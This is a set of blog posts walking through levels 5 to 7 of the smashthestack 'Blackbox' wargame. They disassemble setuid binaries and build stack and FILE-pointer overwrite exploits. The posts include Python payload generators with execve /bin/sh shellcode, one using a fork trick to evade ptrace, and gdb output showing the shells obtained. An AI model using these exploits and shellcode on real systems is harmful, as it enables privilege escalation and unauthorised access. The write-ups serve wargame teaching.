 80484fd: 8b 00                 mov    (%eax),%eax
This just loads eax with the address of argv[1] (again, should be familiar from the previous chapter).
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
Now, this is a call to a safe strncpy with the destination being ebp-0x3f0, which we will call from now on buf, the source being argv[1] and the maximum size limit being 0x3e7.
The next piece of code is a bit tricky:
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
This is basically an inline implementation of strlen with buf as the argument. For a more in depth explanation of how this works you can check out this article. Bottom line, eax now contains the length of buf, which is the number of bytes until the first string terminator.
However, and this is important, there is an interesting point about strncpy, and that is that if the source string is longer than the limit, it will not terminate the string at the destination. This means that buf will not necessarily have a string terminator inside it, and then strlen will keep searching up the rest of the stack for a 0x00.
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
This puts a string terminator after the end of buf.
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
This performs a search on buf for the character '$'=0x24 using strchr, which if successful, returns some non-0 pointer to the character, or NULL on failure.
If the search is successful, i.e. we have a '$' in our buffer, we are turned towards:
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
This prints a message and exits. This is important since this path does not lead to a return from main.
If we do not have a '$' in buf, we go to:
 804857c: e8 f3 fd ff ff        call   8048374 
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret
Which contains a return from main.
Now, here I'd like to discuss the last few lines of code in detail. The thing is, that when ret is executed, it pops whatever esp points to, and jumps there.
Notice that before the return, esp is loaded with ecx-4, while ecx is popped from the stack.
Before we continue, I just want to sketch the stack:
Now suppose this scenario:
  1. We supply a very long, yet to be determined, argument to the program.
  2. The important thing is that we want ecx to be 0xbfff0100.
  3. This will make strlen stop when it reaches the LSB of the stored ecx, which means that a new 0x00 byte will be written on the second byte of the stored ecx, resulting in 0xbfff0000, which is an address 256 bytes lower than the original ecx.
  4. That address is actually an address inside buf.
  5. When at the end of main, that address (-4) will be loaded into esp, we can make sure that it contains the address of the bottom of buf.
  6. The bottom of buf itself will contain a shellcode.
So, let's analyze how ecx might be affected. First, let's see what's its value is without any arguments:
level7@blackbox:~$ gdb heybabe
GNU gdb 6.4.90-debian
...
(gdb) b main
Breakpoint 1 at 0x8048473
(gdb) run
Starting program: /home/level7/heybabe 

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfffda80:	0xbfffdaa0
We would like that to be 0xbfff0100. So let's try with an argument 0xbfffdaa0-0xbfff0100=0xd9a0 bytes long:
(gdb) run `python -c "print 'a'*0xd9a0"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level7/heybabe `python -c "print 'a'*0xd9a0"`

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfff00e0:	0xbfff0100
Good. You can also see that ebp-8=0xbfff00e0 so ebp=0xbfff00e8.
This means that the tampered ecx will point to ebp-0xe8. So, 4 bytes blow that, at ebp-0xec, we should prepare the address ebp-0x3f0=0xbffefcf8.

Now that we have the structure of the payload figured out, we need to figure out the payload.

Remember that the call to ptrace with PTRACE_TRACEME will make the process stop before any call to execve.
How can we circumvent that? Well, the ptrace is active only on the process that called it, so if we were to fork, the child process will not be traced, and can do whatever it wants without any limitations.
So what the shellcode needs to do is fork, the child should call execve, and the parent should wait for the child (this way we can interact with the shell and not cause it to just run in the background).
We want out shellcode to be the equivalent of the following C code:
pid = fork();
if (pid == 0) {
    execve(...);
} else {
    wait(NULL);
}
We have already worked out the code for the execve in the second chapter. Let's figure out the other two.
Instead of disassembling fork, I'll disassemble vfork, because fork under libc does not use the fork system call, but rather clone (look in notes of the fork man pages).
(gdb) disas vfork
Dump of assembler code for function vfork:
0x00c6f950 :	pop    %ecx
0x00c6f951 :	mov    %gs:0x4c,%edx
0x00c6f958 :	mov    %edx,%eax
0x00c6f95a :	neg    %eax
0x00c6f95c :	jne    0xc6f963 
0x00c6f95e :	mov    $0x80000000,%eax
0x00c6f963 :	mov    %eax,%gs:0x4c
0x00c6f969 :	mov    $0xbe,%eax
0x00c6f96e :	int    $0x80
...
Now for wait. The thing is, wait is not a system call by itself, wait4 is. The prototype for wait4 is:
pid_t wait4(pid_t pid, int *status, int options, struct rusage *rusage);
So wait(NULL) is equivalent to wait4(-1, NULL, 0, NULL) . Using a pid of -1 means it waits for any child process (from the man page of waitpid).
The disassembly of wait4's wrapper is:
(gdb) disas wait4
Dump of assembler code for function wait4:
0x00c6ef70 :	push   %esi
0x00c6ef71 :	push   %ebx
0x00c6ef72 :	mov    0x18(%esp),%esi
0x00c6ef76 :	mov    0x14(%esp),%edx
0x00c6ef7a :	mov    0x10(%esp),%ecx
0x00c6ef7e :	mov    0xc(%esp),%ebx
0x00c6ef82 :	mov    $0x72,%eax
0x00c6ef87 :	int    $0x80
...
So let's write our shellcode and try it out. I've written it with ptrace in the beginning so we can make sure it works under the same constraints as it would in the exploit.
level7@blackbox:/tmp$ cat &gt; shellcode7.c
#include <sys/ptrace.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int pid;
    pid = getpid();
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    __asm__(
        "xorl %eax,%eax\n\t"
        "movb $0xbe,%al\n\t"
        "int $0x80\n\t"
        "test %eax,%eax\n\t"
        "je child\n\t"
        "xorl %eax,%eax\n\t"
        "xorl %ebx,%ebx\n\t"
        "dec %ebx\n\t"
        "xorl %ecx,%ecx\n\t"
        "xorl %edx,%edx\n\t"
        "xorl %esi,%esi\n\t"
        "movb $0x72,%al\n\t"
        "int $0x80\n"
        "child:\n\t"
        "xorl  %eax,%eax\n\t"
        "pushl %eax\n\t"
        "pushl $0x68732f2f\n\t"
        "pushl $0x6e69622f\n\t"
        "movl  %esp, %ebx\n\t"
        "pushl %eax\n\t"
        "pushl %ebx\n\t"
        "movl  %esp, %ecx\n\t"
        "xorl  %edx, %edx\n\t"
        "movb  $0x0b, %al\n\t"
        "int $0x80"
    );
    return 0;
}

level7@blackbox:/tmp$ gcc -o shellcode7 shellcode7.c
level7@blackbox:/tmp$ ./shellcode7
sh-3.1$
It works.
Let's extract the raw code, and embed it in a script:
level7@blackbox:/tmp$ cat &gt; gen7.py
import struct

SHELLCODE = "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd8031c050682f2f7368682f62696
e89e3505389e131d2b00bcd80".decode("hex")
BUF = 0xbffefcf8

ARG = SHELLCODE
ARG += 'X' * (0x3f0 - 0xec - len(ARG))
ARG += struct.pack("ARG += 'X' * (0xd9a0 - len(ARG))

print ARG
Show time:
level7@blackbox:~$ ~/heybabe `python /tmp/gen7.py`
Walk the way of the 1337 one!1���̀��t1�1�K1�1�1��r̀1�Ph//shh/bin��PS��1Ò°
                                                                      XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX����XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXsh-3.1$ 
sh-3.1$ cat /home/level8/password
????????????
On to the next level (sorry for the spam there, but that IS the output)

Friday, January 27, 2012

Blackbox - chapter 6

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Level 6. You should know the drill by now:
$ ssh -p 2225 level6@blackbox.smashthestack.org
level6@blackbox.smashthestack.org's password:
...
level6@blackbox:~$ ls -l
total 16
-rwsr-xr-x 1 level7 level7 7599 2008-01-24 05:09 fsp
-rw-r--r-- 1 root   level6   13 2007-12-29 14:10 password
-rw-r--r-- 1 root   root     32 2008-01-24 05:04 temp

Ah...no source file this time. Well, looks like we will have to make do with what we have.
Usually we start of with a disassembly of the .text section, but this time, I'd like to start off with the .rodata section because we will need it to better understand the disassembled code:
level6@blackbox:~$ objdump -s --section=.rodata fsp

fsp:     file format elf32-i386

Contents of section .rodata:
 8048610 03000000 01000200 75736167 65203a20  ........usage : 
 8048620 2573203c 61726775 6d656e74 3e0a0061  %s <argument>..a
 8048630 0074656d 70006e6f 20736567 6661756c  .temp.no segfaul
 8048640 74207965 740a00                      t yet..
Here, I've even colored the relevant strings. Let's just make a little summary of addresses and the strings they contain:
8048618: usage : %s <argument>
804862f: a
8048631: temp
8048636: no segfault yet
Now we'll disassemble main from the .text section, and I'll go ahead annotate the places with the above addresses:
level6@blackbox:~$ objdump -d fsp|grep -A49 "<main>:"
08048444 <main>:
 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048448: 83 e4 f0              and    $0xfffffff0,%esp
 804844b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804844e: 55                    push   %ebp
 804844f: 89 e5                 mov    %esp,%ebp
 8048451: 51                    push   %ecx
 8048452: 81 ec 34 04 00 00     sub    $0x434,%esp
 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)
 804845e: a1 36 86 04 08        mov    0x8048636,%eax          ;"no segfault yet"
 8048463: 89 45 e7              mov    %eax,0xffffffe7(%ebp)
 8048466: a1 3a 86 04 08        mov    0x804863a,%eax          ;"egfault yet"
 804846b: 89 45 eb              mov    %eax,0xffffffeb(%ebp)
 804846e: a1 3e 86 04 08        mov    0x804863e,%eax          ;"ult yet"
 8048473: 89 45 ef              mov    %eax,0xffffffef(%ebp)
 8048476: a1 42 86 04 08        mov    0x8048642,%eax          ;"yet"
 804847b: 89 45 f3              mov    %eax,0xfffffff3(%ebp)
 804847e: 0f b6 05 46 86 04 08  movzbl 0x8048646,%eax          ;"\0"
 8048485: 88 45 f7              mov    %al,0xfffffff7(%ebp)
 8048488: 8b 85 d8 fb ff ff     mov    0xfffffbd8(%ebp),%eax
 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>
 8048493: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 8048499: 8b 42 04              mov    0x4(%edx),%eax
 804849c: 8b 00                 mov    (%eax),%eax
 804849e: 89 44 24 04           mov    %eax,0x4(%esp)
 80484a2: c7 04 24 18 86 04 08  movl   $0x8048618,(%esp)       ;"usage : %s <argument>"
 80484a9: e8 9a fe ff ff        call   8048348 <printf@plt>
 80484ae: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484b5: e8 9e fe ff ff        call   8048358 <exit@plt>
 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)
 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)
 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>
 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>
 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>
Now, one thing that should serve to guide us is that there is no return from main, only exit calls. This means that overwriting the return address will be of no use here.
Bearing that in mind, let's first reconstruct the image of the stack while trying to understand what the program does:
 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx
This means ecx points to the first argument of main, which is argc. A few lines later we can see:
 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)
Which means that the address of argc is stored in ebp-0x428.
We then have:
 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>
Which is just a check to verify there is at least one argument to the program, after which there must be a jump to the rest of main, or a usage printout in case of a mismatch.
Whatever happens in the main flow of main is pretty straightforward:
 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)
This opens the file called temp in append mode, and puts the return value (which is fp) in ebp-0x8.
Next piece of code is:
 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)
Which loads the address of argc to edx, then loads the value stored 4 bytes above that address, which is argv, into eax. This makes eax point to &argv[0], adding 4 to eax will make it point to &argv[1], and dereferencing that pointer will make eax itself point to argv[1]. That address is stored in esp+0x4 which makes it a second argument to a function (which is about to be called):
 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>
This loads the first argument with ebp-0x419, which is just some address within the stack which we can call buf, and then calls strcpy. Effectively, argv[1] is copied into buf, and might I also add that it does so in an unsafe fashion.
What it does next is:
 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>
That's loading fp as the second argument, and buf as the first argument, and calling fputs.
After that, the program just exits with 0:
 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>
Just to put it all together, here's a picture of the stack-frame:
Well, the only thing we can overwrite by exploiting the unsafe strcpy are fp and the return address, though seeing that main never returns, but rather exits, we are only left with fp. Let's work with that.
The only thing for which fp is used, after being returned from fopen, is in fputs, so let's see what happens there. Since the executable is not statically compiled, I will use gdb to disassemble fputs (cropped to the interesting parts only):
level6@blackbox:~$ gdb fsp
...
(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run
Starting program: /home/level6/fsp 

Breakpoint 1, 0x08048452 in main ()
(gdb) disassemble fputs
Dump of assembler code for function fputs:
0x001b24a0 <fputs+0>:   push   %ebp
0x001b24a1 <fputs+1>:   mov    %esp,%ebp
0x001b24a3 <fputs+3>:   sub    $0x1c,%esp
0x001b24a6 <fputs+6>:   mov    %ebx,0xfffffff4(%ebp)
0x001b24a9 <fputs+9>:   mov    0x8(%ebp),%eax
0x001b24ac <fputs+12>:  call   0x170d10 <free@plt+112>
0x001b24b1 <fputs+17>:  add    $0xd7b43,%ebx
0x001b24b7 <fputs+23>:  mov    %esi,0xfffffff8(%ebp)
0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi
0x001b24bd <fputs+29>:  mov    %edi,0xfffffffc(%ebp)
0x001b24c0 <fputs+32>:  mov    %eax,(%esp)
0x001b24c3 <fputs+35>:  call   0x1c7e30 <strlen>
0x001b24c8 <fputs+40>:  mov    %eax,0xfffffff0(%ebp)
0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>
...
0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>
0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax
0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)
...
Let's see what happens here. First, inside the function, the first parameter, buf, is at ebp+0x8, and the second, fp, is at ebp+0xc. We don't care about buf, only fp.
So the first thing that happens with fp is:
0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi
This just stores fp in esi, so we have to keep our eyes open to esi references as well. Next:
0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>
This looks familiar from the previous level. It tests for the first long word in the FILE structure pointed by fp to have a certain flag set. If it is set, the program will move in a direction desirable to us:
0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>
This checks that the 0x46th byte into fp is 0x00, and jumps to some location if it is. We do not want it to jump there, so we will make sure there is something non-zero at that address.
The next piece of code is:
0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax
What happens here is that the byte at fp+0x46 is copied into eax with size and sign extend (which means that the rest of eax will be zeroed out). And then that value is used as an index in some list that starts at fp+0x94. The value at that list index is copied to eax.
Let's see what happens next:
0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)
This piece of code sets two function arguments, but we don't care about them, because what it does next is call the function whose address is stored at eax+0x1c.

It should be clear by this time what we need to do:
  1. Whatever we have in the first argument to the program will be copied into buf.
  2. The beginning of the payload should start with 0x80808080 to make sure we pass the flag check.
  3. The 0x46th byte needs to be something different from 0x00, let's just choose it to be 0x01.
  4. The long word at 0x94+0x01=0x95 should contain a pointer. Let's make it point to 0x95+4=0x99 (just one slot after the current one).
  5. At 0x99+0x1c=0xb5 we should have another pointer to 0xb5+4=0xb9.
  6. Then we insert the shellcode.
  7. Then there should be some filler which will complete the payload to 0x411 bytes.
  8. The last 4 bytes will overwrite fp and so they should be the address of the bottom of buf.
Or, better put in a diagram:
All that's left now is to discover ebp so we can fill that structure up. Remember that the payload is 0x411+4=0x415 bytes long:
level6@blackbox:~$ gdb fsp
...

(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run `python -c "print 'a'*0x415"`
Starting program: /home/level6/fsp `python -c "print 'a'*0x415"`

Breakpoint 1, 0x08048452 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd678
And write some script to generate the payload:
level6@blackbox:/tmp$ cd /tmp
level6@blackbox:/tmp$ cat > genpayload.py
import struct
EBP = 0xbfffd678
BUF = EBP - 0x419
PTR1 = BUF + 0x99
PTR2 = BUF + 0xb9
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")

FILE = ""
FILE += struct.pack("<L", 0x80808080)
FILE += '\x90' * (0x46 - 4)
FILE += "\x01"
FILE += '\x90' * (0x95 - 0x47)
FILE += struct.pack("<L", PTR1)
FILE += '\x90' * (0xb5 - 0x99)
FILE += struct.pack("<L", PTR2)
FILE += SHELLCODE
FILE += '\x90' * (0x419 - 8 - len(FILE))
FILE += struct.pack("<L", BUF)

print FILE
Let's give it a shot:
level6@blackbox:~$ ~/fsp `python /tmp/genpayload.py`
sh-3.1$ cat /home/level7/password
cat: /home/level7/password: No such file or directory
sh-3.1$ cat /home/level7/passwd
??????????
Done!

Wednesday, January 25, 2012

Blackbox - chapter 5


As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Hello again. Make sure you are comfortable, because this is going to be a somewhat long level, and rather more difficult that what we saw so far.
First order of business, login & ls:
$ ssh -p 2225 level5@blackbox.smashthestack.org
level5@blackbox.smashthestack.org's password:
...
level5@blackbox:~$ ls -l
total 560
-rwsr-xr-x 1 level6 level6 557846 2008-01-12 21:17 list
-rw-r--r-- 1 root   level5    475 2007-12-29 14:10 list.c
-rw-r--r-- 1 root   level5     10 2007-12-29 14:10 password

And now we take a look at the source file:
level5@blackbox:~$ cat list.c 
#include <stdio.h>


int main(int argc, char **argv)
{
    char buf[100];
    size_t len;
    char fixedbuf[10240];
    FILE *fh;
    char *ptr = fixedbuf;
    int i;

    fh = fopen("somefile", "r");
    if(!fh)
        return 0;

    while((len = fread(buf, 1, 100, fh)) > 0) {
        for(i = 0; i < len; i++) {
            // Disable output modifiers
            switch(buf[i]) {
            case 0xFF:
            case 0x00:
            case 0x01:
                break;
            default:
                *ptr = buf[i];
                ptr++;
            }
        }
    }
    printf("%s", fixedbuf);

    fclose(fh);
}
The program seems to open some fixed file from the current path (which means that we will have to generate that somefile" file under /tmp), it then proceeds to read chunks of 100bytes from the file into some temporary buffer, which are copied to a bigger buffer while filtering-out specific byte values.
The contents of the big buffer are then printed out to us.

Well, our attack surface is obviously the file filename. We can also notice that if filename is indeed longer than 10240 bytes, the read-chunk-and-copy loop will happily continue its business, whereby it will probably mess up the stack.
So lets try and see what the stack frame looks like. And the way to do that is to look at the diassembly of main:
level5@blackbox:~$ objdump -d list|grep -A65 "<main>:"
08048208 <main>:
 8048208: 8d 4c 24 04           lea    0x4(%esp),%ecx
 804820c: 83 e4 f0              and    $0xfffffff0,%esp
 804820f: ff 71 fc              pushl  0xfffffffc(%ecx)
 8048212: 55                    push   %ebp
 8048213: 89 e5                 mov    %esp,%ebp
 8048215: 51                    push   %ecx
 8048216: 81 ec 94 28 00 00     sub    $0x2894,%esp
 804821c: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
 8048222: 89 45 f4              mov    %eax,0xfffffff4(%ebp)
 8048225: c7 44 24 04 88 32 0a  movl   $0x80a3288,0x4(%esp)
 804822c: 08 
 804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp)
 8048234: e8 57 af 00 00        call   8053190 <_IO_new_fopen>
 8048239: 89 45 f0              mov    %eax,0xfffffff0(%ebp)
 804823c: 83 7d f0 00           cmpl   $0x0,0xfffffff0(%ebp)
 8048240: 75 43                 jne    8048285 <main+0x7d>
 8048242: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
 8048249: 00 00 00 
 804824c: e9 8f 00 00 00        jmp    80482e0 <main+0xd8>
 8048251: c7 45 f8 00 00 00 00  movl   $0x0,0xfffffff8(%ebp)
 8048258: eb 23                 jmp    804827d <main+0x75>
 804825a: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 804825d: 0f b6 44 05 88        movzbl 0xffffff88(%ebp,%eax,1),%eax
 8048262: fe c0                 inc    %al
 8048264: 3c 02                 cmp    $0x2,%al
 8048266: 77 02                 ja     804826a <main+0x62>
 8048268: eb 10                 jmp    804827a <main+0x72>
 804826a: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 804826d: 0f b6 54 05 88        movzbl 0xffffff88(%ebp,%eax,1),%edx
 8048272: 8b 45 f4              mov    0xfffffff4(%ebp),%eax
 8048275: 88 10                 mov    %dl,(%eax)
 8048277: ff 45 f4              incl   0xfffffff4(%ebp)
 804827a: ff 45 f8              incl   0xfffffff8(%ebp)
 804827d: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 8048280: 3b 45 ec              cmp    0xffffffec(%ebp),%eax
 8048283: 72 d5                 jb     804825a <main+0x52>
 8048285: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
 8048288: 89 44 24 0c           mov    %eax,0xc(%esp)
 804828c: c7 44 24 08 64 00 00  movl   $0x64,0x8(%esp)
 8048293: 00 
 8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp)
 804829b: 00 
 804829c: 8d 45 88              lea    0xffffff88(%ebp),%eax
 804829f: 89 04 24              mov    %eax,(%esp)
 80482a2: e8 09 b0 00 00        call   80532b0 <_IO_fread>
 80482a7: 89 45 ec              mov    %eax,0xffffffec(%ebp)
 80482aa: 83 7d ec 00           cmpl   $0x0,0xffffffec(%ebp)
 80482ae: 0f 95 c0              setne  %al
 80482b1: 84 c0                 test   %al,%al
 80482b3: 75 9c                 jne    8048251 <main+0x49>
 80482b5: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
 80482bb: 89 44 24 04           mov    %eax,0x4(%esp)
 80482bf: c7 04 24 93 32 0a 08  movl   $0x80a3293,(%esp)
 80482c6: e8 e5 ab 00 00        call   8052eb0 <_IO_printf>
 80482cb: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
 80482ce: 89 04 24              mov    %eax,(%esp)
 80482d1: e8 0a ac 00 00        call   8052ee0 <_IO_new_fclose>
 80482d6: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
 80482dd: 00 00 00 
 80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
 80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp
 80482ec: 59                    pop    %ecx
 80482ed: 5d                    pop    %ebp
 80482ee: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80482f1: c3                    ret
Wow, good thing the executable has symbol information, because the way to identify the position of the local variables in the stack is by tracking library function calls.

Lets start with these two lines though:
 804821c: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
 8048222: 89 45 f4              mov    %eax,0xfffffff4(%ebp)
This looks like an address assignment, we have such a line in the C program:
    char *ptr = fixedbuf;
This means that fixedbuf starts at ebp-0x2878, and ptr is stored at ebp-0xc.

Next we have a call to _IO_new_fopen:
